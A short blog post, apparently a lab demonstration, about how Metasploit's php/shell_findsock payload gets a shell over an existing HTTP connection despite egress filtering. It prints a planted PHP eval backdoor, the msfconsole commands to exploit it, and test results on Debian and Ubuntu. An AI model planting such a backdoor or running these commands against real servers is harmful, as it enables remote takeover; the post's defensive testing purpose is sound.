A good firewall setup has ingress and egress filtering. On a new setup, I like to set very strict rules for incoming and outgoing traffic. Setting up a new LAMP server etc, making sure its only can connect out to the places it should need to have access too, is a good security practice. Then open port 80 for connection from the world, minus .ru and .cn etc 🙂
So I thought…
Then egypt, from metasploit, made and presented me to the “php/shell_findsock payload”, which I think is awesome!
If you can get the LAMP server to some way execute the $shell_findsock payload, you can in many cases get a shell over the established http connection! You can also use the payload with other php exploits in the framework.
egypt states that “this payload leaves conspicuous evil-looking entries in the apache error logs”, but I did not get any on my Debian Etch test server. But on my Ubuntu intrepid, I got :
sh: Syntax error: Bad fd number
Invalid method in request exit
egypt also states: “The issue this payload takes advantage of (CLOEXEC flag not set on sockets) appears to have been patched on the Ubuntu version of Apache”
My test on a plain fresh install of Ubuntu 8.10 (Intrepid Ibex) shows that it works.
In the test case, I left my “backdoor” on the server in test.php with the code: <?php eval($_GET[‘evalme’]); ?>, which would be the default for this metasploit setup.
msf < use exploit/unix/webapp/php_eval
msf exploit(php_eval) > set PAYLOAD php/shell_findsock
msf exploit(php_eval) > set RHOST http://www.gamelinux.org
msf exploit(php_eval) > exploit
And you thought that you where safe!
On my Debian Etch, the suhosin patch stopped the attack, but not on my Ubuntu Intrepid.